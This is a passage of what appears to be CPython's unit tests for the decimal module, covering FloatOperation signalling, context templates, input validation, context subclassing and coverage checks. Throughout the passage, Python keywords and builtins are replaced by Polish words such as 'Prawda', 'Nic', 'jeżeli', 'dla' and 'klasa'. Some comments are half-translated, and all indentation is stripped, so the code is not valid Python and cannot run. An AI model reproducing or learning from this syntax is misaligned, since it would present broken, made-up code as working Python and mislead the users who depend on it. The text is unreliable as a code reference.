c.traps[FloatOperation] = Prawda
# implicit conversion podnieśs
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertPrawda(c.flags[FloatOperation])
# explicit conversion jest silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertNieprawda(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertNieprawda(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=Nic):
context.clear_flags()
f = getattr(a, attr)
jeżeli signal == FloatOperation:
self.assertRaises(signal, f, b)
inaczej:
self.assertIs(f(b), Prawda)
self.assertPrawda(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=Nic):
# Order
dla attr w '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
dla attr w '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, Nic)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, Nic)
assert_attr(neg_zero_d, zero_f, '__eq__', c, Nic)
assert_attr(zero_d, neg_zero_f, '__eq__', c, Nic)
assert_attr(zero_d, zero_f, '__eq__', c, Nic)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, Nic)
assert_attr(inf_d, inf_f, '__eq__', c, Nic)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, Nic)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, Nic)
assert_attr(neg_inf_d, inf_f, '__ne__', c, Nic)
assert_attr(inf_d, neg_inf_f, '__ne__', c, Nic)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, Nic)
def test_containers(c, signal=Nic):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
jeżeli signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
inaczej:
s = sorted([10.0, Decimal('10.0')])
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 w [Decimal('10.0'), 1.0]
self.assertPrawda(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 w {Decimal('10.0'):'a', 1.0:'b'}
self.assertPrawda(c.flags[FloatOperation])
nc = Context()
przy localcontext(nc) jako c:
self.assertNieprawda(c.traps[FloatOperation])
doit(c, signal=Nic)
test_containers(c, signal=Nic)
c.traps[FloatOperation] = Prawda
doit(c, signal=FloatOperation)
test_containers(c, signal=FloatOperation)
def test_float_operation_default(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
FloatOperation= self.decimal.FloatOperation
context = Context()
self.assertNieprawda(context.flags[FloatOperation])
self.assertNieprawda(context.traps[FloatOperation])
context.clear_traps()
context.traps[Inexact] = Prawda
context.traps[FloatOperation] = Prawda
self.assertPrawda(context.traps[FloatOperation])
self.assertPrawda(context.traps[Inexact])
klasa CContextFlags(ContextFlags):
decimal = C
klasa PyContextFlags(ContextFlags):
decimal = P
klasa SpecialContexts(unittest.TestCase):
"""Test the context templates."""
def test_context_templates(self):
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
assert_signals(self, BasicContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow, Underflow, Clamped]
)
savecontext = getcontext().copy()
basic_context_prec = BasicContext.prec
extended_context_prec = ExtendedContext.prec
ex = Nic
spróbuj:
BasicContext.prec = ExtendedContext.prec = 441
dla template w BasicContext, ExtendedContext:
setcontext(template)
c = getcontext()
self.assertIsNot(c, template)
self.assertEqual(c.prec, 441)
wyjąwszy Exception jako e:
ex = e.__class__
w_końcu:
BasicContext.prec = basic_context_prec
ExtendedContext.prec = extended_context_prec
setcontext(savecontext)
jeżeli ex:
podnieś ex
def test_default_context(self):
DefaultContext = self.decimal.DefaultContext
BasicContext = self.decimal.BasicContext
ExtendedContext = self.decimal.ExtendedContext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
self.assertEqual(BasicContext.prec, 9)
self.assertEqual(ExtendedContext.prec, 9)
assert_signals(self, DefaultContext, 'traps',
[InvalidOperation, DivisionByZero, Overflow]
)
savecontext = getcontext().copy()
default_context_prec = DefaultContext.prec
ex = Nic
spróbuj:
c = getcontext()
saveprec = c.prec
DefaultContext.prec = 961
c = getcontext()
self.assertEqual(c.prec, saveprec)
setcontext(DefaultContext)
c = getcontext()
self.assertIsNot(c, DefaultContext)
self.assertEqual(c.prec, 961)
wyjąwszy Exception jako e:
ex = e.__class__
w_końcu:
DefaultContext.prec = default_context_prec
setcontext(savecontext)
jeżeli ex:
podnieś ex
klasa CSpecialContexts(SpecialContexts):
decimal = C
klasa PySpecialContexts(SpecialContexts):
decimal = P
klasa ContextInputValidation(unittest.TestCase):
def test_invalid_context(self):
Context = self.decimal.Context
DefaultContext = self.decimal.DefaultContext
c = DefaultContext.copy()
# prec, Emax
dla attr w ['prec', 'Emax']:
setattr(c, attr, 999999)
self.assertEqual(getattr(c, attr), 999999)
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(TypeError, setattr, c, attr, 'xyz')
# Emin
setattr(c, 'Emin', -999999)
self.assertEqual(getattr(c, 'Emin'), -999999)
self.assertRaises(ValueError, setattr, c, 'Emin', 1)
self.assertRaises(TypeError, setattr, c, 'Emin', (1,2,3))
self.assertRaises(TypeError, setattr, c, 'rounding', -1)
self.assertRaises(TypeError, setattr, c, 'rounding', 9)
self.assertRaises(TypeError, setattr, c, 'rounding', 1.0)
self.assertRaises(TypeError, setattr, c, 'rounding', 'xyz')
# capitals, clamp
dla attr w ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
# Invalid attribute
self.assertRaises(AttributeError, setattr, c, 'emax', 100)
# Invalid signal dict
self.assertRaises(TypeError, setattr, c, 'flags', [])
self.assertRaises(KeyError, setattr, c, 'flags', {})
self.assertRaises(KeyError, setattr, c, 'traps',
{'InvalidOperation':0})
# Attributes cannot be deleted
dla attr w ['prec', 'Emax', 'Emin', 'rounding', 'capitals', 'clamp',
'flags', 'traps']:
self.assertRaises(AttributeError, c.__delattr__, attr)
# Invalid attributes
self.assertRaises(TypeError, getattr, c, 9)
self.assertRaises(TypeError, setattr, c, 9)
# Invalid values w constructor
self.assertRaises(TypeError, Context, rounding=999999)
self.assertRaises(TypeError, Context, rounding='xyz')
self.assertRaises(ValueError, Context, clamp=2)
self.assertRaises(ValueError, Context, capitals=-1)
self.assertRaises(KeyError, Context, flags=["P"])
self.assertRaises(KeyError, Context, traps=["Q"])
# Type error w conversion
self.assertRaises(TypeError, Context, flags=(0,1))
self.assertRaises(TypeError, Context, traps=(1,0))
klasa CContextInputValidation(ContextInputValidation):
decimal = C
klasa PyContextInputValidation(ContextInputValidation):
decimal = P
klasa ContextSubclassing(unittest.TestCase):
def test_context_subclassing(self):
decimal = self.decimal
Decimal = decimal.Decimal
Context = decimal.Context
Clamped = decimal.Clamped
DivisionByZero = decimal.DivisionByZero
Inexact = decimal.Inexact
Overflow = decimal.Overflow
Rounded = decimal.Rounded
Subnormal = decimal.Subnormal
Underflow = decimal.Underflow
InvalidOperation = decimal.InvalidOperation
klasa MyContext(Context):
def __init__(self, prec=Nic, rounding=Nic, Emin=Nic, Emax=Nic,
capitals=Nic, clamp=Nic, flags=Nic,
traps=Nic):
Context.__init__(self)
jeżeli prec jest nie Nic:
self.prec = prec
jeżeli rounding jest nie Nic:
self.rounding = rounding
jeżeli Emin jest nie Nic:
self.Emin = Emin
jeżeli Emax jest nie Nic:
self.Emax = Emax
jeżeli capitals jest nie Nic:
self.capitals = capitals
jeżeli clamp jest nie Nic:
self.clamp = clamp
jeżeli flags jest nie Nic:
jeżeli isinstance(flags, list):
flags = {v:(v w flags) dla v w OrderedSignals[decimal] + flags}
self.flags = flags
jeżeli traps jest nie Nic:
jeżeli isinstance(traps, list):
traps = {v:(v w traps) dla v w OrderedSignals[decimal] + traps}
self.traps = traps
c = Context()
d = MyContext()
dla attr w ('prec', 'rounding', 'Emin', 'Emax', 'capitals', 'clamp',
'flags', 'traps'):
self.assertEqual(getattr(c, attr), getattr(d, attr))
# prec
self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
dla signal w (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertPrawda(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
jeżeli self.decimal == C:
dla signal w (Inexact, Overflow, Rounded):
self.assertPrawda(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
dla signal w (Rounded, DivisionByZero):
self.assertPrawda(c.flags[signal])
c.clear_flags()
dla signal w OrderedSignals[decimal]:
self.assertNieprawda(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
dla signal w (Rounded, DivisionByZero):
self.assertPrawda(c.traps[signal])
c.clear_traps()
dla signal w OrderedSignals[decimal]:
self.assertNieprawda(c.traps[signal])
klasa CContextSubclassing(ContextSubclassing):
decimal = C
klasa PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
klasa CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertPrawda(C.HAVE_THREADS jest Prawda albo C.HAVE_THREADS jest Nieprawda)
self.assertPrawda(P.HAVE_THREADS jest Prawda albo P.HAVE_THREADS jest Nieprawda)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(C.__libmpdec_version__, P.__libmpdec_version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s dla s w dir(C.Context()) jeżeli '__' w s albo nie s.startswith('_')]
y = [s dla s w dir(P.Context()) jeżeli '__' w s albo nie s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s dla s w dir(C.Decimal(9)) jeżeli '__' w s albo nie s.startswith('_')]
y = [s dla s w dir(C.Decimal(9)) jeżeli '__' w s albo nie s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
klasa Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX podnieś?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
dla sig w OrderedSignals[self.decimal]:
c.flags[sig] = Nieprawda
c.traps[sig] = Nieprawda
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
przy localcontext() jako c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), Prawda)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), Nieprawda)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), Prawda)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertPrawda(Decimal("1").is_canonical())
self.assertPrawda(Decimal("1").is_finite())
self.assertPrawda(Decimal("1").is_finite())
self.assertPrawda(Decimal("snan").is_snan())
self.assertPrawda(Decimal("-1").is_signed())
self.assertPrawda(Decimal("0").is_zero())
self.assertPrawda(Decimal("0").is_zero())
# Copy
przy localcontext() jako c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
przy localcontext() jako c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertPrawda(q.is_nan() oraz r.is_nan())
c.traps[InvalidOperation] = Nieprawda
q, r = divmod(Decimal("NaN"), 7)
self.assertPrawda(q.is_nan() oraz r.is_nan())
c.traps[InvalidOperation] = Nieprawda
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertPrawda(q.is_nan() oraz r.is_nan())
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertPrawda(q.is_infinite() oraz r.is_nan())
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertPrawda(q.is_nan() oraz r.is_nan())
self.assertPrawda(c.flags[InvalidOperation])
c.traps[DivisionByZero] = Nieprawda
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertPrawda(q.is_infinite() oraz r.is_nan())
self.assertPrawda(c.flags[InvalidOperation] oraz
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
przy localcontext() jako c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertPrawda(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = Nieprawda
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertPrawda(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
przy localcontext() jako c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = Nieprawda
x = Decimal(99).quantize(Decimal("1e1"))
self.assertPrawda(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
dla attr w ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
przy localcontext() jako c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
klasa CCoverage(Coverage):
decimal = C
klasa PyCoverage(Coverage):
decimal = P
klasa PyFunctionality(unittest.TestCase):
"""Extra functionality w decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, oraz the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
dla fmt, d, result w test_values:
self.assertEqual(format(Decimal(d), fmt), result)
klasa PyWhitebox(unittest.TestCase):
"""White box testing dla decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines w _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
przy localcontext() jako c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations oraz check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) dla s w OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=Nieprawda):
jeżeli useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
inaczej:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", Prawda)
checkSameDec("__divmod__", Prawda)
checkSameDec("__eq__", Prawda)
checkSameDec("__ne__", Prawda)
checkSameDec("__le__", Prawda)
checkSameDec("__lt__", Prawda)
checkSameDec("__ge__", Prawda)
checkSameDec("__gt__", Prawda)
checkSameDec("__float__")
checkSameDec("__floordiv__", Prawda)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", Prawda)
checkSameDec("__mul__", Prawda)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", Prawda)
checkSameDec("__radd__", Prawda)
checkSameDec("__rdivmod__", Prawda)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", Prawda)
checkSameDec("__rmod__", Prawda)
checkSameDec("__rmul__", Prawda)
checkSameDec("__rpow__", Prawda)
checkSameDec("__rsub__", Prawda)
checkSameDec("__str__")
checkSameDec("__sub__", Prawda)
checkSameDec("__truediv__", Prawda)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", Prawda)
checkSameDec("max", Prawda)
checkSameDec("min", Prawda)
checkSameDec("normalize")
checkSameDec("quantize", Prawda)
checkSameDec("remainder_near", Prawda)
checkSameDec("same_quantum", Prawda)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
przy localcontext() jako c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertPrawda(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
klasa CFunctionality(unittest.TestCase):
"""Extra functionality w _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support dla IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
dla i, v w enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
klasa CWhitebox(unittest.TestCase):
"""Whitebox testing dla _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow przy pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
przy localcontext() jako c:
c.prec = 1000000
dla i w range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large dla _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
przy localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test jest _decimal-only because flags are nie printed
# w the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
dla sig w OrderedSignals[C]:
c.flags[sig] = Prawda
c.traps[sig] = Prawda
c.flags[FloatOperation] = Prawda
c.traps[FloatOperation] = Prawda
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment z a signal dict przy the correct length but
# one invalid key.
d = c.flags.copy()
usuń d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 jeżeli HAVE_CONFIG_64 inaczej 2**31-1
gt_max_emax = 10**18 jeżeli HAVE_CONFIG_64 inaczej 10**9
# prec, Emax, Emin
dla attr w ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin w context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow w conversion
